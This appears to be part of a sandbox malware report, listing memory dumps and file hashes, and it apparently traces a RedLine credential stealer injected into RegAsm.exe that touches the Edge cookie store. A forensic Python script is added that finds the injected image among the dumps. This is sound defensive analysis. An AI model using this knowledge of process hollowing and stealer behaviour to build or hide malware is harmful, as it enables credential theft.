memory/4348-227-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-229-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-256-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-255-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/2456-259-0x0000000002D90000-0x0000000002DC6000-memory.dmp
memory/2456-260-0x00000000056B0000-0x0000000005CD8000-memory.dmp
memory/4784-262-0x0000000005D20000-0x0000000005D86000-memory.dmp
memory/4784-263-0x0000000005D90000-0x0000000005DF6000-memory.dmp
memory/4784-261-0x0000000005400000-0x0000000005422000-memory.dmp
memory/4784-264-0x0000000005E40000-0x0000000006194000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfnnphm5.aiw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4360-302-0x00000000061C0000-0x000000000620C000-memory.dmp
memory/4360-301-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/836-305-0x0000000006D20000-0x0000000006DB6000-memory.dmp
memory/836-307-0x0000000006030000-0x0000000006052000-memory.dmp
memory/836-306-0x0000000005F60000-0x0000000005F7A000-memory.dmp
memory/2456-308-0x0000000007980000-0x0000000007F24000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2436b635cfbbcb083b5b822bbbd1766f |
| SHA1 | 3c685c7d704905eb2ebe8868d1c4fbf77a260df5 |
| SHA256 | 4b1be1a64fd793be2dcbf17aadbf17efe219564e988c85c8113d58028cdd0c54 |
| SHA512 | 99cc64e67999f6c1e65cb6e9062a30bd7fa133a11230e28aaa4a01b7f05ea7e48ffc3c727c7eabd55d53be505d8a97c29181839b8977fa81a41cb9eb7e88b21f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab9e666fbf81d1bade718a9d090b3cc8 |
| SHA1 | 336d4418791cf3a3a43747b2cbce64d27e6f9eb2 |
| SHA256 | ab9b8fb9bda51953b5639dcb82b2ab5169277f9f30e801c3959d7db6337b19ea |
| SHA512 | ad77405dd1dd5a5100df00d4f92aa11a075b32be8e10fee633fcb8338f21dc11edeb4b7a1274dd48d8f2e468d816486aad033f8270fe9d1aacce4048bd2c0b98 |
memory/3032-330-0x0000000005A20000-0x0000000005D74000-memory.dmp
memory/3032-360-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/3032-359-0x0000000007160000-0x0000000007192000-memory.dmp
memory/3032-370-0x00000000071A0000-0x00000000071BE000-memory.dmp
memory/3032-371-0x00000000071C0000-0x0000000007263000-memory.dmp
memory/4052-372-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4816-383-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4240-393-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/3032-394-0x0000000007930000-0x0000000007FAA000-memory.dmp
memory/3032-404-0x0000000007370000-0x000000000737A000-memory.dmp
memory/3032-405-0x00000000074F0000-0x0000000007501000-memory.dmp
memory/4052-407-0x0000000007470000-0x000000000747E000-memory.dmp
memory/4052-408-0x0000000007480000-0x0000000007494000-memory.dmp
memory/4052-409-0x0000000007570000-0x000000000758A000-memory.dmp
memory/4052-410-0x0000000007550000-0x0000000007558000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c71a8dc614d33487d936e8dc24c16c14 |
| SHA1 | 08c231d3f620af564102c38d588f1b9cf88c1b22 |
| SHA256 | de2bdf4372ec3d859d2d34d8bf18566318c71e828bf765253e0442e2544645c6 |
| SHA512 | 9e49ce3152ed1a992b8b0c3e47cf083499cc73ad7a5310455d1eb7abcdba8fb4910cf926633aabde8ef7780d80812298d72537b575c916ca7af6cc6737f7d7f3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 03d69955495ed2d4ed4c66035227ffb5 |
| SHA1 | 89bc196457ca1307fa4a6f6d7aaf0bc96b017063 |
| SHA256 | e207712d8b59f3f25846a7f0df052cbf731ca9a8f203e0ab621b26cc64ce3c3e |
| SHA512 | de04d9fcfd8e053884a786d73237bc77d8d545f8f6b10a4672bf774a3d378b6626c419013e5c4b7be657466dd5695b22f902a4007b341e2d58415fde8e9bf06a |
memory/4348-434-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-439-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/3468-446-0x0000000005FB0000-0x0000000006304000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b193dba84e0315043c23544303b6ab6b |
| SHA1 | 0ffc2d7f2cde07d85d92f513efc1736eb4cccf15 |
| SHA256 | 0e9369af5430d970e568d31495d042e36a7f0f4d0c01303fd444372bc7946850 |
| SHA512 | a8b95d6912ae6fb4942a24b6aadb18d875b5ba38ec779f2fbe8227c62f9580df0ea856e6e3507a5c3279694f431d0c1791ab35331d197741b93ed4c90cefbfe5 |
memory/3468-452-0x0000000006C40000-0x0000000006C8C000-memory.dmp
memory/460-463-0x0000000005D20000-0x0000000006074000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d5129ceb34356797ee4592ade484f308 |
| SHA1 | 603405f89b7ac1f18c7fbdbcc64e490a43809219 |
| SHA256 | cdd9c0a823e8e20d2523be31ac4637088e6e518aac3fd2a6d5a622bd3ce45e67 |
| SHA512 | 6cd350d22f361eb401225154951cd597a1f1e10a9776305182b5c77cae6193c9da8e54b15c2beadaaedea75c70be34460396bf917d4286958915a0db3c6372ae |
memory/460-465-0x00000000063B0000-0x00000000063FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1720967645459.exe
| MD5 | b4415b066e4dac6fb6849d0237bcdcf9 |
| SHA1 | d089566c069035f0f4ba147984d738114ba6ee90 |
| SHA256 | 3b30eb80b02910f592f5aa93e22af80b5e178785484e24b975892c0403073506 |
| SHA512 | 23291fbd5ff5e201209e9d034bbc87108b535cdec4a97b33e7934f974730eddecb4806d107518d1ec0a311d842a41b575eb8264d2ca23952c5337e97c0b4dc26 |
memory/4652-469-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4652-470-0x00000000062E0000-0x00000000068F8000-memory.dmp
memory/4652-471-0x0000000005D10000-0x0000000005D22000-memory.dmp
memory/4652-472-0x0000000005E40000-0x0000000005F4A000-memory.dmp
memory/4652-473-0x0000000006B00000-0x0000000006B3C000-memory.dmp
memory/4652-474-0x0000000006B40000-0x0000000006B8C000-memory.dmp
memory/4652-475-0x0000000006E80000-0x0000000007042000-memory.dmp
memory/4652-476-0x0000000007580000-0x0000000007AAC000-memory.dmp
memory/4652-477-0x0000000007260000-0x00000000072F2000-memory.dmp
memory/4652-478-0x00000000070D0000-0x0000000007146000-memory.dmp
memory/4652-479-0x0000000006E50000-0x0000000006E6E000-memory.dmp
memory/4652-480-0x00000000071A0000-0x00000000071F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | 5d3da8e9ab09ced1e70bbdb7f08d6d7a |
| SHA1 | 6c775119468cf2708e56763950eafb58dae0a3f4 |
| SHA256 | 3a3dfe5f88d485cd08342a9aab67f9332afb309830ec74e86d13f10e985b87dc |
| SHA512 | 1caca15c1653fe34e83e69ae730d8d84ea57baa042fb203166dc2167130e0420862faae41942bf9a0fb1a09dbefacd2a519661cc19c4e6fe88a9d8d601fc70b6 |
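The memory/… entries in the Files section are the sandbox's dumps of regions it found worth keeping, named memory/<pid>-<sequence>-<start>-<end>-memory.dmp. Read together with the SetThreadContext row (PID 1636 set thread context of 4652, from 1720967645459.exe into RegAsm.exe), the dumps for PID 4652 are where injected code should be, and the first of them sits at 0x400000, the linker's default image base for a 32-bit executable, which is where a hollowed host ends up carrying a foreign PE. The report itself does not say which dump holds the RedLine payload, and it contains no dumps for the injector PID 1636. The Python below is an added example, not part of the report, that parses a subset of those names, groups them by PID, separates ranges that recur across several processes (consistent with a module mapped at the same address in each, so not a unique payload) from regions unique to the target, and picks out the image-base region; the default-image-base heuristic is this example's assumption.

```python
"""Group the sandbox's memory dumps by PID and pick out the candidate injected image
in the SetThreadContext target.  Added example; dump names and PIDs are copied from the report."""
import re
from collections import defaultdict

# Dump names copied from the Files section (constructed subset); PIDs from the
# "PID 1636 set thread context of 4652" signature row.
DUMPS = """
memory/2316-155-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4348-185-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/3032-330-0x0000000005A20000-0x0000000005D74000-memory.dmp
memory/3032-360-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4052-372-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4816-383-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4652-469-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4652-470-0x00000000062E0000-0x00000000068F8000-memory.dmp
memory/4652-471-0x0000000005D10000-0x0000000005D22000-memory.dmp
""".split()

INJECTOR_PID, TARGET_PID = 1636, 4652
DEFAULT_IMAGE_BASE = 0x00400000     # linker default base for 32-bit executables (heuristic)

DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_dumps(names):
    """memory/<pid>-<seq>-<start>-<end>-memory.dmp -> dicts with integer fields."""
    out = []
    for name in names:
        m = DUMP_RE.match(name)
        if not m:
            continue
        start, end = int(m[3], 16), int(m[4], 16)
        out.append({"pid": int(m[1]), "seq": int(m[2]), "start": start,
                    "end": end, "size": end - start, "name": name})
    return out


def by_pid(dumps):
    """All dumps taken from each process, keyed by PID."""
    groups = defaultdict(list)
    for d in dumps:
        groups[d["pid"]].append(d)
    return dict(groups)


def image_base_regions(dumps, pid):
    """Regions of `pid` starting at the default image base: in the process named as a
    SetThreadContext target, the first thing to carve and scan for an MZ/PE header."""
    return [d for d in dumps if d["pid"] == pid and d["start"] == DEFAULT_IMAGE_BASE]


def shared_ranges(dumps):
    """(start, end) ranges dumped from more than one PID: consistent with a module mapped
    at the same address in each process, so lower priority than a range unique to the target."""
    owners = defaultdict(set)
    for d in dumps:
        owners[(d["start"], d["end"])].add(d["pid"])
    return {rng: pids for rng, pids in owners.items() if len(pids) > 1}


if __name__ == "__main__":
    dumps = parse_dumps(DUMPS)
    for d in image_base_regions(dumps, TARGET_PID):
        print(f'PID {TARGET_PID}: {d["size"]:#x} bytes at {d["start"]:#010x} ({d["name"]})')
    for (start, end), pids in shared_ranges(dumps).items():
        print(f"shared {start:#010x}-{end:#010x} in PIDs {sorted(pids)}")
```

The address is a heuristic, not proof: .NET assemblies built with default settings and many packers also load at 0x400000 (PID 2316 has a region there too), so confirm by carving the PID 4652 dump for an MZ header and checking that the PE inside is not RegAsm.exe before treating it as the payload.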